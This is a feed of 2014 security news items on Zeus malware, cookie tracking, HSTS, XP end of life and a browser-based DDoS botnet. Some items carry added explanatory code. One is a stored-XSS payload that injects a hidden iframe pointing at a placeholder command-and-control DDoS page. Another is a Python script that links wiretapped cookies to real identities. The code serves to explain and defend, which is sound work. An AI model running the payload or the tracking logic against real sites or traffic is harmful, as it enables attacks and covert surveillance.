Feed aggregator

New Zeus Variant Comes Complete With a Signed Certificate

Threatpost for B2B - Mon, 04/07/2014 - 14:51

Yet another variant of the Zeus banking Trojan has surfaced. This one is disguised as an Internet Explorer document, is signed with a valid digital certificate, and downloads a rootkit onto infected machines.

According to researchers at the certificate authority Comodo, more than 200 samples of the Trojan have been found in the wild so far.

The Trojan arrives either as a suspicious email attachment that the user opens or via an exploit. Once running, the fake IE document does the routine Zeus work of a man-in-the-browser (MitB) attack: it steals data entered into web forms, login credentials and credit card numbers, which are then used for financial fraud.

What’s interesting is that Comodo says the bogus IE file is signed with a seemingly legitimate code-signing certificate issued to the Swiss software development firm Isonet AG, which has helped the malware evade antivirus detection.

Once it runs, the file copies itself into memory, executes, and downloads rootkit components from two locations. The rootkit is decrypted into a driver and registered in the Boot Bus Extender service group, which ensures it loads before other drivers and keeps the Trojan that much more covert.

“Its purpose is to protect malicious files and auto-run entries from being deleted by user or antivirus software, increasing difficulty of the removal process,” Comodo wrote in a description of the malware last Thursday.

Abusing forged and stolen certificates, whether code-signing certificates like this one or SSL certificates, has become commonplace among criminals looking to con users and put their machines at risk; just a few months ago a slew of fake SSL certificates were caught masquerading as legitimate ones for services such as Facebook, YouTube and iTunes.

In the wake of the big-name CA compromises of recent years, such as GlobalSign and DigiNotar, Google moved all of its SSL certificates from 1024-bit to 2048-bit RSA keys last fall and, along with Mozilla, is in the process of capping certificate validity at 60 months, in hopes of limiting the damage from further certificate abuse.

When it comes to certificate abuse, Comodo itself made news in 2011 when an attacker claiming to be Iranian used the compromised credentials of a Comodo reseller to issue himself a handful of valid certificates for Google, Yahoo, Skype, Mozilla and other domains. Comodo was quick to revoke the fraudulent certificates and to deploy additional audits and controls against future incidents.

Crypto Model Based on Human Cardiorespiratory Coupling

Threatpost for B2B - Mon, 04/07/2014 - 14:21

A novel, so far theoretical encryption scheme inspired by new insights into the way the human heart and lungs communicate is said to be substantially different from existing cryptographic methods and highly resistant to conventional attacks.

The research was undertaken and published by Professors Tomislav Stankovski, Peter McClintock, and Aneta Stefanovska from the Department of Physics at the United Kingdom’s Lancaster University.

“Here we offer a novel encryption scheme derived from biology, radically different from any earlier procedure,” said Stankovski. “Inspired by the time-varying nature of the cardio-respiratory coupling functions recently discovered in humans, we propose a new encryption scheme that is highly resistant to conventional methods of attack.”

Under this new cryptographic scheme, the sender’s communications would be encrypted as time variations of coupling functions from a pair of dynamical systems. These encrypted communications would then travel to and be decrypted by a second pair of identical dynamical systems using the same coupling functions. This, the researchers explain, is analogous to the way in which the human heart and lungs work to communicate with one another.

According to an introduction to the concept posted by the Computer Science Department at Brown University, “Dynamical systems are mathematical objects used to model physical phenomena whose state (or instantaneous description) changes over time. These models are used in financial and economic forecasting, environmental modeling, medical diagnosis, industrial equipment diagnosis, and a host of other applications.”

For a bit of context, the researchers explain that a recent discovery in the field of biology demonstrated that cardiorespiratory coupling functions can be broken down into a number of independent functions and that those functions are of a time-varying nature. In other, simpler words: these coupling functions can essentially be deconstructed and used as ciphers.

“As so often happens with important breakthroughs,” said Professor Stefanovska, “this discovery was made right on the boundary between two different subjects – because we were applying physics to biology.”

These findings, they explain, yield complex functions drawn from biomedicine that can be applied to building efficient, modular secure communications.

“The use of coupling functions in this way confers an unbounded number of encryption possibilities,” the researchers wrote in a popular summary of their work. “We demonstrate that the scheme enables more than one signal to be transmitted/received simultaneously and that it is exceptionally robust against external noise.”

The researchers argue that using coupling functions instead of standard cryptographic methods increases security by offering a greater degree of freedom in the encryption process without changing the qualitative state of the system, and that the method is therefore a significant conceptual advance for cryptography.

The scheme, the researchers claim, is also highly modular, which would let it be implemented in a wide array of applications and communications protocols.

“This promises an encryption scheme that is so nearly unbreakable that it will be equally unwelcome to internet criminals and official eavesdroppers,” McClintock claims.

The advantage, the researchers write, is that the method offers an infinite number of choices for the secret key shared between sender and receiver, which they say makes it virtually impossible for hackers and eavesdroppers to crack. A large key space is necessary but not sufficient, though: what decides the scheme's security is whether an eavesdropper who records the transmitted signal can reconstruct the coupling functions, and earlier synchronisation-based chaotic ciphers have been broken by exactly that kind of analysis, so independent cryptanalysis is needed before the "nearly unbreakable" claim can be taken at face value.

“Unlike all earlier encryption procedures, this cipher makes use of the coupling functions between interacting dynamical systems,” the researchers wrote. “It results in an unbounded number of encryption key possibilities, allows the transmission or reception of more than one signal simultaneously, and is robust against external noise. Thus, the information signals are encrypted as the time variations of linearly independent coupling functions.”

The researchers have published a PDF of their short but dense paper, along with a diagram illustrating how the method works; neither is reproduced here.

Connecting the Dots Between Cookies and Identities

Threatpost for B2B - Mon, 04/07/2014 - 13:23

A team of computer scientists from Princeton has released a paper explaining how an adversary with a passive presence on a network or Internet backbone could track individuals by observing HTTP cookies.

The motivation for the project was news in December that the National Security Agency had the capability to access Google’s PREF cookies to conduct surveillance on individual targets. PREF cookies are preferences cookies that websites reference to learn a user’s preferred language for localization purposes and other personalization features.

Since much isn’t known in detail about how the NSA gathers PREF cookies, the Princeton team decided to take more of a high-level approach with their experiment in order to connect the dots between the cookies that are dropped on a user’s machine as they surf the Web in order to establish their real-world identity.

Assuming an adversary, whether a criminal or an intelligence agency, has a presence on the network, the working premise is that the first- and third-party cookies set by sites and advertisers can be used to tie a user to web traffic without the adversary having to worry about dynamic IP addresses, according to the paper, “Cookies that give you away: Evaluating the surveillance implications of web tracking,” written by Dillon Reisman, Steven Englehardt, Christian Eubank, Peter Zimmerman, and Arvind Narayanan. HTTPS is not a complete answer either: the paper notes that many websites reveal a logged-in user’s identity in plaintext.

“Thus, an adversary that can wiretap the network can not only cluster together the web pages visited by a user, but can then attach real-world identities to those clusters. This technique relies on nothing other than the network traffic itself for identifying targets,” the paper said. “Even if a user’s identity isn’t leaked in plaintext, if the adversary in question has subpoena power they could compel the disclosure of an identity corresponding to a cookie, or vice versa.”

The paper illustrates the idea with a user who visits three pages, A, B and C, on which two third-party trackers, X and Y, are embedded. The adversary passively observes the traffic. A single visit reveals nothing on its own; the links appear once the pages share a tracker.

“The unique cookie from X connects A and C while the one from Y connects B and C. We assume here that the user has visited pages with both trackers before so that cookies have already been set in her browser and will be sent with each request.”

The experiment modelled a user who visits up to 300 websites over a two-to-three-month period and looked for elements that would connect those visits to an identity. The paper reports that 90 percent of visits could be clustered this way.

“It applies even if the adversary is able to observe only a small, random subset of the user’s requests,” the paper said. “We find that on average, over two-thirds of time, a web page visited by a user has third-party trackers.”

The researchers also learned that 60 percent of the top 50 Alexa websites transmit identifying information in plaintext, such as a user’s name or email address, once a user is logged in, greatly enhancing the experiment’s chances of success.

An attacker interested in monitoring the web activities of a target or set of targets can scan for identity information in the plaintext HTTP traffic or target the cookie ID from a first-party page, the paper said. The researchers said this starting point enables the attacker to “transitively” connect the first-party cookie to other first- and third-party cookies to tie an identity to a cluster of traffic.
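The transitive linking described above, as an added example that is not the paper's code: a constructed wiretap log is clustered with union-find over the (host, cookie name, cookie value) triples seen in cleartext requests, and a plaintext identity leak is then attached to the whole cluster. All hosts, IP addresses, cookie values and the identity are made up. Requests marked as HTTPS have their cookies hidden from the observer, which is why the last visit stays unlinked even though it belongs to the same user.

```python
"""Passive cookie linking (illustrative, not the Princeton paper's code)."""
from collections import defaultdict


def req(visit, ip, host, page, cookies, https=False, identity=None):
    """One HTTP request as seen on the wire.
    visit    - which first-party page load it belongs to (from Referer/timing)
    ip       - client address; it changes between visits, as with dynamic IPs
    host     - host the request went to (first party or third-party tracker)
    page     - first-party site the user was on
    cookies  - cookies carried by the request
    https    - True when the request was encrypted, so cookies are invisible
    identity - identifier leaked in plaintext (an e-mail address, say), if any"""
    return {"visit": visit, "ip": ip, "host": host, "page": page,
            "cookies": cookies, "https": https, "identity": identity}


# Constructed log; hosts, addresses and values are invented for the example.
OBSERVED = [
    req("v1", "10.0.0.5", "news.example", "news.example", {"sid": "n-111"}),
    req("v1", "10.0.0.5", "tracker-x.example", "news.example", {"xid": "X-777"}),
    req("v1", "10.0.0.5", "tracker-z.example", "news.example", {"zid": "Z-555"}, https=True),
    req("v2", "10.0.0.9", "shop.example", "shop.example", {"cart": "s-222"}),
    req("v2", "10.0.0.9", "tracker-y.example", "shop.example", {"yid": "Y-888"}),
    req("v3", "10.0.0.42", "social.example", "social.example", {"login": "l-333"},
        identity="alice@example.org"),
    req("v3", "10.0.0.42", "tracker-x.example", "social.example", {"xid": "X-777"}),
    req("v3", "10.0.0.42", "tracker-y.example", "social.example", {"yid": "Y-888"}),
    # a different user hitting tracker X: distinct cookie value, must not be merged
    req("v4", "10.0.0.5", "other.example", "other.example", {"sid": "o-444"}),
    req("v4", "10.0.0.5", "tracker-x.example", "other.example", {"xid": "X-999"}),
    # Alice again, but the only shared cookie travels inside TLS, so it stays unlinked
    req("v5", "10.0.0.77", "blog.example", "blog.example", {"sid": "b-666"}),
    req("v5", "10.0.0.77", "tracker-z.example", "blog.example", {"zid": "Z-555"}, https=True),
]


def _find(parent, x):
    while parent[x] != x:
        parent[x] = parent[parent[x]]   # path halving
        x = parent[x]
    return x


def _union(parent, a, b):
    ra, rb = _find(parent, a), _find(parent, b)
    if ra != rb:
        parent[rb] = ra


def cluster_visits(requests):
    """Union-find over page visits: two visits are joined when any request in
    them presented the same (host, cookie name, cookie value) triple in the
    clear. IP addresses play no part, which is the point of the technique."""
    parent = {}
    first_seen = {}
    for r in requests:
        parent.setdefault(r["visit"], r["visit"])
        if r["https"]:
            continue            # cookies inside TLS are not observable
        for name, value in r["cookies"].items():
            key = (r["host"], name, value)
            if key in first_seen:
                _union(parent, first_seen[key], r["visit"])
            else:
                first_seen[key] = r["visit"]
    groups = defaultdict(set)
    for v in parent:
        groups[_find(parent, v)].add(v)
    return [frozenset(g) for g in groups.values()]


def attach_identities(requests):
    """Map each cluster to an identity leaked in plaintext by any of its visits."""
    leaks = {r["visit"]: r["identity"]
             for r in requests if r["identity"] and not r["https"]}
    out = {}
    for cluster in cluster_visits(requests):
        names = sorted({leaks[v] for v in cluster if v in leaks})
        out[cluster] = names[0] if names else None
    return out


def browsing_history(requests, identity):
    """Pages the observer can attribute to `identity`, whatever IPs were used."""
    pages = set()
    for cluster, who in attach_identities(requests).items():
        if who == identity:
            pages.update(r["page"] for r in requests if r["visit"] in cluster)
    return sorted(pages)


if __name__ == "__main__":
    for cluster, who in attach_identities(OBSERVED).items():
        print(sorted(cluster), "->", who)
```

The same loop works over a sparse capture: dropping most of the records only removes links, it never creates false ones, which matches the paper's observation that a small random subset of requests still clusters.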

“We hope that these findings will inform the policy debate on both surveillance and the web tracking ecosystem,” the paper said. “We also hope that it will raise awareness of privacy breaches via subtle inference techniques.”

Chrome Adds Ability to Force Ephemeral Mode

Threatpost for B2B - Mon, 04/07/2014 - 10:16

Google has made a subtle change to the Google Admin console, which enterprises use to set policies for employees’ use of Chrome, that lets administrators force users to browse in ephemeral mode.

The change won’t have any effect on typical individual users who run Chrome in an unmanaged environment, such as a home machine or enterprise that doesn’t use the admin console. But for administrators in environments where they’re managing a lot of users running Chrome, the ability to force ephemeral mode is a helpful tool in the fight against data loss and other security problems.

Ephemeral mode is a function that allows users to browse the Web on a shared device or a personal laptop by using a profile that won’t save any data or history after the browser is closed. The profile is saved to the machine’s disk and the user has the ability to sign in to Chrome Sync, but once the user closes the browser at the end of the session, the profile is destroyed.

“If Google Chrome Sync is enabled, any changes that the user makes to the browser’s settings or to their Chrome data (such as bookmarks, history, apps etc.) during an ephemeral session will be saved for future sessions. The settings are saved in the user’s Google account in the cloud. If Google Chrome Sync is not enabled, any changes are lost when the user exits the browser,” Google’s documentation on the feature says.

Ephemeral mode is somewhat similar to incognito mode, a feature of the Chrome browser that lets users browse without any personal settings and without Chrome saving cookies, history or any other identifying information. But there are a few key differences between ephemeral and incognito modes. Most importantly, a user has the ability to choose when or if to use incognito mode.

With ephemeral mode, administrators set that as a policy on a global basis. Also, in ephemeral mode, users have access to their Chrome settings and bookmarks through Chrome Sync. Incognito mode does not allow users to access personal settings.

Despite its advantages, ephemeral mode still depends on the user in one respect.

“When ephemeral mode is set at the user level in the Google Admin console, it relies on the user to sign in to Chrome for sync benefits and for the policy to take effect. The policy should only be used on devices that the user trusts and that are compliant with other corporate policies,” Google says.


IE 12 to Support HSTS Encryption Protocol

Threatpost for B2B - Fri, 04/04/2014 - 15:41

Microsoft confirmed today it will support HTTP Strict Transport Security (HSTS) in Internet Explorer 12, bringing its browser in line with the other major vendors’ support for the mechanism.

A browser that supports HSTS remembers, for any host that has sent the Strict-Transport-Security header over a valid HTTPS connection, that the host must only be reached over HTTPS; for as long as the policy’s max-age lasts it rewrites any http:// request to that host to https:// before the request leaves the browser, so communication to and from the site is encrypted.

According to OWASP, HSTS protects users from a number of threats, man-in-the-middle attacks in particular, not only by forcing encrypted sessions but also by stopping attackers who present invalid digital certificates: for a host with an HSTS policy the browser treats a certificate error as fatal and removes the option to click through the warning. HSTS also protects users of HTTPS websites that include HTTP links or serve some content unencrypted.
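An added example, not code from Microsoft, OWASP or the EFF: a minimal model of the HSTS state a browser keeps, following the rules in RFC 6797. It honours the header only when received over an error-free HTTPS connection, upgrades later http:// URLs for the host (and its subdomains when includeSubDomains is present) until max-age runs out, treats max-age=0 as a deletion, and denies any click-through on certificate errors for a known host. Host names and clock values are constructed.

```python
"""Minimal HSTS policy store (illustrative, not any browser's code)."""
import time


class HstsStore:
    """Per-browser HSTS state: host -> (expiry timestamp, includeSubDomains)."""

    def __init__(self, now=time.time):
        self.now = now            # injectable clock so expiry can be exercised
        self.policies = {}

    def process_header(self, host, header_value, over_tls, cert_valid):
        """Record a Strict-Transport-Security header.

        Per RFC 6797 the header is honoured only when it arrives over an HTTPS
        connection with no certificate errors; a max-age of 0 removes any stored
        policy for the host. Returns True when the stored state changed."""
        if not (over_tls and cert_valid):
            return False
        directives = {}
        for part in header_value.split(";"):
            name, _, value = part.strip().partition("=")
            directives[name.strip().lower()] = value.strip().strip('"')
        if "max-age" not in directives or not directives["max-age"].isdigit():
            return False
        max_age = int(directives["max-age"])
        host = host.lower()
        if max_age == 0:
            return self.policies.pop(host, None) is not None
        self.policies[host] = (self.now() + max_age, "includesubdomains" in directives)
        return True

    def is_known(self, host):
        """True when host, or a parent domain whose policy covers subdomains,
        has an unexpired policy. Expired entries are dropped on lookup."""
        labels = host.lower().split(".")
        for i in range(len(labels)):
            candidate = ".".join(labels[i:])
            policy = self.policies.get(candidate)
            if policy is None:
                continue
            expires_at, include_subdomains = policy
            if expires_at <= self.now():
                del self.policies[candidate]
                continue
            if i == 0 or include_subdomains:
                return True
        return False

    def rewrite(self, url):
        """Upgrade http:// URLs for known hosts before any request leaves."""
        if not url.startswith("http://"):
            return url
        rest = url[len("http://"):]
        host = rest.split("/", 1)[0].split(":", 1)[0]
        return "https://" + rest if self.is_known(host) else url

    def allow_cert_error_override(self, host):
        """A known HSTS host gets a hard failure on certificate errors."""
        return not self.is_known(host)
```

The model also shows the gap HSTS leaves on its own: the policy is learned only after a first successful HTTPS visit, so the very first http:// request to a site is still exposed, which is why browsers additionally ship preload lists of hosts that are HSTS from the start.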

IE 12 is expected to be released this year; IE 11 was introduced in October 2013 and is the default browser in Windows 8.1.

IE 12’s support for HSTS puts it on an even keel with the other browsers, some of which, such as Chrome and Firefox, have supported it since 2011. Apple added HSTS support to Safari with the release of OS X 10.9 Mavericks.

According to the Electronic Frontier Foundation’s Encrypt the Web report, a few leading technology companies already support HSTS on their websites, including Dropbox, Foursquare, SpiderOak and Twitter. Others such as Facebook, LinkedIn, Tumblr, and Yahoo also plan to do so this year; Google too for select domains.

EFF staff technologist Jeremy Gillula said today that developers either are unaware of the availability of HSTS, or have been stymied by incomplete support in browsers.

“This is changing though: we noticed that Apple quietly added HSTS support to Safari in OS X 10.9,” Gillula said. “For now, Internet Explorer doesn’t support HSTS—which means that there’s basically no such thing as a secure website in IE.”

Until that happens, much of the security burden falls on the user to either rely on a browser that supports HSTS, or use something such as the HTTPS Everywhere browser extension.

“For now all a savvy user can do is to always carefully examine the address of the site you’ve loaded, and verify that it’s secure by checking to make sure it has “https” in the front and is the precise address you want to visit,” Gillula said. “Unfortunately this assumes that you know ahead of time (and remember) whether or not a site should be secure, and are meticulous with every website you visit.”

Protections such as HTTPS, HSTS and forward-secret cipher suites (perfect forward secrecy) have been given greater priority now that the extent of NSA and government surveillance has been exposed. Experts urge developers to treat encryption measures such as these as a minimum standard for web-based services such as email.

Just this week, Yahoo caught up to many of its contemporaries when it announced that it had encrypted traffic moving between its data centers; Snowden documents revealed that the NSA and Britain’s GCHQ were able to tap into overseas fiber optic cables and copy data as it moved to the company’s data centers. Yahoo also announced its intention to support HSTS, Perfect Forward Secrecy and Certificate Transparency this year.

Microsoft to Block Unwanted Adware July 1

Threatpost for B2B - Fri, 04/04/2014 - 14:11

Microsoft has announced that this summer it will change the way it classifies adware and will begin blocking programs that show unwanted and intrusive advertisements.

New objective criteria drafted by the company stipulate that as of July 1, programs that display ads must give each ad a visible close button and clearly state which program is behind it, or they will be classified as adware.

Michael Johnson, a researcher at the company’s Malware Protection Center, described the changes in a blog post on Thursday afternoon.

According to Johnson advertisements must adhere to the following rules, or they “will be detected as adware and immediately removed from the user’s machine:”

Advertisements must:

  • Include an obvious way to close the ad.
  • Include the name of the program that created the ad.

Currently when Microsoft’s security products detect a program is operating suspiciously, the program is allowed to run, and the user is alerted and then given a recommended option to proceed. On July 1 when adware is found, Microsoft will stop the program entirely, notify the user and give them the option to restore it if they want.

Going forward users will also be given the option to uninstall whatever program is making the ads – providing of course the program has an uninstall entry in the Windows control panel.

The efforts are being implemented partly to better provide users with choice and control but also to give developers a three-month time period to ensure their programs comply with Microsoft’s new rules.

The approach reflects the company’s latest objective criteria update that defines how its antimalware products, products such as Security Essentials, Windows Defender, Safety Scanner, etc., will identify potentially unwanted software.

“We believe that it will make it easy for software developers to utilize advertising while at the same time empowering users to control their experience,” Johnson wrote of the new criteria yesterday.

Windows XP End-Of-Life Breeding Equal Parts FUD, Legit Concerns

Threatpost for B2B - Fri, 04/04/2014 - 12:13

For those of you anticipating the start of a Walking Dead-style malware apocalypse next Tuesday, calm yourselves.

The official end of security support for Windows XP is upon us, but it’s important to check some anxiety at the door and keep some perspective.

“I’ve been a forensics investigator 14 years and in my experience, I don’t know that I’ve come across one incident, or very few anyway, where a vulnerability was exploited where an unpatched system wasn’t the source of a breach,” said Christopher Pogue, director at Trustwave. Pogue said breaches are much more likely to be blamed on poor passwords, weak access control systems or a poorly configured firewall than on a glaring hole in the underlying operating system.

“All the administration stuff in place around these systems falls down. Attackers leverage that because they want the path of least resistance,” Pogue said. “You have to presume that before they get their exploit on an unpatched XP machine, they have to breach the environment, bypass firewalls, get to the system, pivot to the unpatched system and hope it has critical data on it so they can run exploit code. There are a whole lot of items that have to line up for that to happen.”

The hype and hyperbole around April 8, the latest in a long line of security doomsdays, is rooted in the theory that because a good number of XP systems remain in use storing data and processing transactions, any previously unreported XP vulnerability will become a perpetual zero-day. The theory continues that attackers have been building and hoarding XP exploits, anxiously wringing their hands while waiting for April 8, 2014 to come and go.

Dismissing all of that as FUD would be foolhardy: some attackers who hold XP exploits that will become permanent zero-days in five days are going to wait. Others are less patient (see the recent Rich Text Format zero-day affecting XP, which will be patched on Tuesday). And for the smaller organizations with fewer IT resources that still have XP machines humming along and carrying out their mission day after day, the risk posture will slouch a little more come Tuesday.

Big picture, however, people are moving off XP. Qualys CTO Wolfgang Kandek published numbers based on the company’s flagship vulnerability scanning service indicating that the XP installed base had dipped below 15 percent, down from 35 percent 14 months ago. Migrations in the transportation and health care industries are much more dramatic, he said.

“These are two extremes, but all industries are showing a downward slope (migrating off XP); none are stagnant,” Kandek said.

Kandek is in the camp that believes attackers will intensify their targeting of XP machines and in particular will look at patches for modern Windows 7 and 8 systems to determine whether the same vulnerabilities are present in no-longer-supported XP. He also urges organizations that must use XP to isolate those machines from the network, keep them for a specialized purpose and keep them offline.

“In May, Microsoft will publish bulletins and patches, and those can be taken by a hacker and reverse-engineered. They will ask ‘What does it fix?’ And once they know what it does on Windows 7 or 8, that it changes a DLL or fixes an overflow, they could go into XP and figure out whether the same DLL exists or overflow vulnerability exists,” Kandek said. “Patches map to vulnerabilities that could be in XP. Sometimes they’re only in a new component of Windows 7, but most of the time you can find those vulnerabilities in XP.”

Kandek said that roughly 70 percent of the vulnerabilities patched in 2013 affected every Windows version from XP through Windows 8.

“I don’t see why that would stop in May, June or July. Attackers can use that knowledge as a pointer into XP to find if a vulnerability exists. It’s an accelerator for them. My feeling is that after two or three months, there will be tools in public that reliably exploit XP. I can definitely see how that would make an attacker’s work much easier.”

A key difference to point out, however, is that Windows 7 and 8, for example, are radically different under the hood than XP. Microsoft has invested time and money into building mitigations for a number of dangerous memory-based attacks. Technologies such as ASLR and DEP make it much more challenging and costly for an attacker to execute malicious code against vulnerabilities in the operating system. Looking for bugs in XP that live in Windows 7 or 8 just may not be the best use of resources for an attacker.

“An attacker has always chosen the path of least resistance to gain access to a system; they don’t have to exploit the operating system, and for the most part, haven’t,” Trustwave’s Pogue said. “While it’s still possible, if I were a small business owner and running XP to store and process data, I’d be concerned about it and take steps to run an updated and patched operating system. Even so, it’s important to remember that’s not a silver bullet. Updating to Windows 7 doesn’t mean you’re necessarily safe. You have to build up defense-in-depth mechanisms. XP has been updated and patched up to now, and I’ve investigated thousands of breaches on XP systems. An updated OS does not always equal security.”

Researchers Uncover Interesting Browser-Based Botnet

Threatpost for B2B - Fri, 04/04/2014 - 10:42

Security researchers recently discovered an odd DDoS attack against several sites that relied on a persistent cross-site scripting vulnerability in a major video Web site and hijacked users’ browsers in order to flood the targeted sites with traffic.

The attack on the unnamed site used JavaScript injected through a persistent cross-site scripting flaw: the attacker stored the code in his own profile image on the video site, so it ran in a visitor’s browser whenever a page displaying that profile image loaded. Once the code runs, it adds a hidden iframe carrying a DDoS tool that sends GET requests to the target sites. The attacker then posted comments on hundreds of videos so that his profile image appeared next to each comment.

As more visitors watched the videos, and therefore rendered the malicious image, the GET requests against the targeted sites continued to mount.

“As a result, each time a legitimate visitor landed on that page, his browser automatically executed the injected JavaScript, which in turn injected a hidden <iframe> with the address of the DDoSer’s C&C domain. There, an Ajax-scripted DDoS tool hijacked the browser, forcing it to issue a DDoS request at a rate of one request per second,” Ronen Atia of Incapsula, the security company that discovered the attack, wrote in an analysis.

“Obviously one request per second is not a lot. However, when dealing with video content of 10, 20 and 30 minutes in length, and with thousands of views every minute, the attack can quickly become very large and extremely dangerous. Knowing this, the offender strategically posted comments on popular videos, effectively created a self-sustaining botnet comprising tens of thousands of hijacked browsers, operated by unsuspecting human visitors who were only there to watch a few funny cat videos.”
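The persistent XSS described above, as an added example that is not Incapsula’s code or the affected site’s: a user-supplied profile image URL is placed into an <img> tag. The vulnerable renderer concatenates it, so a value that closes the src attribute and adds an onload handler injects the hidden iframe in the visitor’s browser; the hardened renderer allowlists the scheme and HTML-escapes the value for an attribute context. The payload, template and the hypothetical C&C host c2.invalid are constructed, and the parser at the end shows what a browser would actually see in each case.

```python
"""Stored XSS via a profile image URL: vulnerable and hardened rendering."""
import html
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed attacker-controlled "profile image URL". It is a valid URL up to
# the double quote, which closes the src attribute; the rest adds an onload
# handler that injects a hidden iframe pointing at a hypothetical C&C page.
PAYLOAD = (
    'http://evil.invalid/a.png" onload="'
    "var f=document.createElement('iframe');f.style.display='none';"
    "f.src='http://c2.invalid/ddos.html';document.body.appendChild(f)"
)

TEMPLATE = '<img class="avatar" src="%s">'


def render_avatar_vulnerable(url):
    """Plain interpolation: whatever the user stored lands in the markup verbatim."""
    return TEMPLATE % url


def render_avatar_hardened(url):
    """Allowlist the scheme, then escape for an attribute context (quote=True)."""
    parsed = urlparse(url)
    if parsed.scheme not in ("http", "https") or not parsed.netloc:
        url = "/static/default-avatar.png"   # never echo unrecognised input
    return TEMPLATE % html.escape(url, quote=True)


class _TagCollector(HTMLParser):
    """Collects (tag, attributes) for each start tag, the way a browser sees it."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def parse_tags(markup):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p.tags


if __name__ == "__main__":
    print("vulnerable:", parse_tags(render_avatar_vulnerable(PAYLOAD)))
    print("hardened:  ", parse_tags(render_avatar_hardened(PAYLOAD)))
```

Escaping alone is not enough here, which is why the scheme check is there: a javascript: URL survives html.escape untouched, and only the allowlist keeps it out of the src attribute. A Content-Security-Policy that restricts frame-src would additionally stop the injected iframe from loading the C&C page even if a second encoding bug slipped through.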

The company was able to intercept the malicious requests going to the target sites and traced them back to the compromised video site, which Incapsula is not yet naming. The researchers then inserted a piece of their own JavaScript into the requests, replacing the target URL, which let them pin down the persistent XSS vulnerability; they then alerted the owners of the compromised site.

Despite that success, Atia said that the attacker behind the DDoS has replaced the original tool he was using with a more sophisticated version.

“This leads us to believe that what we saw yesterday was a sort of POC test run. The current code is not only much more sophisticated, but it is also built for keeping track of the attack, for what seems like billing purposes. From the looks of it, someone is now using this Alexa Top 50 website to set up a chain of botnets for hire,” he said.

The attack Incapsula uncovered shares some characteristics with research that Jeremiah Grossman and Matt Johansen of WhiteHat Security presented at Black Hat last year. In their example, an attacker could inject malicious JavaScript into ads distributed via an ad network and force users’ browsers to perform an operation, whether launching a DDoS attack on a target server or something else.

Blog: Stealing from wallets

Secure List feed for B2B - Fri, 04/04/2014 - 07:06
We’ve written several times about mobile malware that can send text messages to premium numbers or steal money from online bank accounts. We also know that cybercriminals are constantly looking for new ways of stealing money using mobile Trojans.

Facebook Bug Bounty Submissions Dramatically Increase

Threatpost for B2B - Thu, 04/03/2014 - 15:00

Facebook today reported a dramatic increase in 2013 submissions to its bug bounty program, and said that despite reports from researchers that it’s becoming difficult to find severe bugs on its various properties, the social network plans to increase rewards for critical bugs.

“The volume of high-severity issues is down, and we’re hearing from researchers that it’s tougher to find good bugs,” Facebook security engineer Collin Greene said. “To encourage the best research in the most valuable areas, we’re going to continue increasing our reward amounts for high priority issues.”

Greene said Facebook paid out $1.5 million in bounties last year, rewarding more than 330 researchers at an average payout of $2,204. Submissions, however, skyrocketed 246 percent over 2012 to 14,763, he said. Most of those, however, were not eligible for a bounty; only six percent were rated high severity. Greene said that Facebook has been able to cut its response time for critical vulnerabilities down to six hours. Facebook also released geographic stats on its bug submissions, revealing that researchers in India contributed the largest number of valid bugs (136), while researchers in Russia earned on average more than anyone from the program, $3,961 (38 bugs). U.S.-based researchers, meanwhile, reported 92 bugs and were rewarded on average $2,272.

“Most submissions end up not being valid issues, but we assume they are until we’ve fully evaluated the report,” Greene said. “That attitude makes it possible for us to triage high-priority issues quickly and get the right resources allocated immediately.”

Most leading technology providers have some sort of vulnerability rewards program. Most, including Google, Yahoo, GitHub and others, reward researchers for finding vulnerabilities in Web-based applications and services. Microsoft, however, is an outlier, paying significant rewards for bypasses of the exploit mitigations built into Windows and other Microsoft products.

These companies are in a constant tug of war with vulnerability brokers, exploit vendors and the black market, most of whom pay more for bugs than vendors do. Microsoft, for example, has tried to narrow the gap with a $100,000 reward for mitigation bypasses, but even a low six-figure payout may pale in comparison to what a less scrupulous researcher could earn on the underground.

Other legitimate programs such as HP’s Zero-Day Initiative offer six-figure paydays at events such as the Pwn2Own contest held in conjunction with the annual CanSecWest conference. This year’s contest paid out $850,000 with French exploit vendor VUPEN cashing in with close to a half-million dollars in prizes.

Facebook’s biggest payout was made in January to Brazilian engineer Reginaldo Silva, who earned $33,500 for what Facebook called an XML External Entity (XXE) attack. The vulnerability could have allowed an attacker to read files from a Facebook server, reach other internal services and potentially execute code. In response Facebook disabled external entities across the board and audited its code for similar endpoints, Greene said.

“One of the most encouraging trends we’ve observed is that repeat submitters usually improve over time,” Greene said. “It’s not uncommon for a researcher who has submitted non-security or low-severity issues to later find valuable bugs that lead to higher rewards.”

To that end, Greene said Facebook is giving researchers a new support dashboard where they can view the status of their submissions. The bug bounty has also now been extended to Facebook acquisitions Instagram, Parse, Atlas and Onavo.

Microsoft to Fix Word Zero Day with Final XP Patch

Threatpost for B2B - Thu, 04/03/2014 - 14:51

In just five days, Microsoft will ship two critical and two important security bulletins in what will be the very last Patch Tuesday release providing support for the Redmond, Washington company’s ancient and always-vulnerable XP operating system.

The critically rated bulletins will address remote code execution vulnerabilities in Microsoft Office, Office Services and Office Web Apps as well as bugs in Windows and Internet Explorer. The important rated bulletins will close holes in Windows and Office.

Of course, the first bulletin will resolve a Microsoft Word zero day. The company issued a special security advisory and produced a Fix-it solution after it spotted targeted attacks exploiting the zero day in the wild late last month. The patch warrants highest priority despite the fact that observed attacks required hackers to perform a complicated chain of exploits.

“This is a critical vulnerability that could allow remote code execution if a user opens an RTF file in Word 2010 or in Outlook while using Word as the email viewer,” explained Russ Ernst, director of product management at Lumension, in an email interview. “Known to be under active attack, a hacker using this vulnerability could gain user rights.”

The second bulletin, Ernst explained, is a cumulative update for Internet Explorer, which is also critically rated and of high priority for the many IE users on the Web.

“If pushing patches for these new vulnerabilities while working a migration plan for XP and Office 2003 users weren’t enough,” Ernst continued, “administrators are still dealing with the fallout from the recent Pwn2Own competition, which revealed vulnerabilities in all of the major browsers and in Adobe’s Flash Player plug-in.”

To drive home that point, IT will indeed have their hands full with this and Pwn2Own fixes from Mozilla and Chrome and a recent patch for Safari from Apple as well.

Wolfgang Kandek from Qualys noted in an interview with Threatpost that this light month of patches is in step with what has been a light overall year for patches. Thus far, Microsoft has issued just 20 bulletins, compared to 36 last year and 28 in 2012.

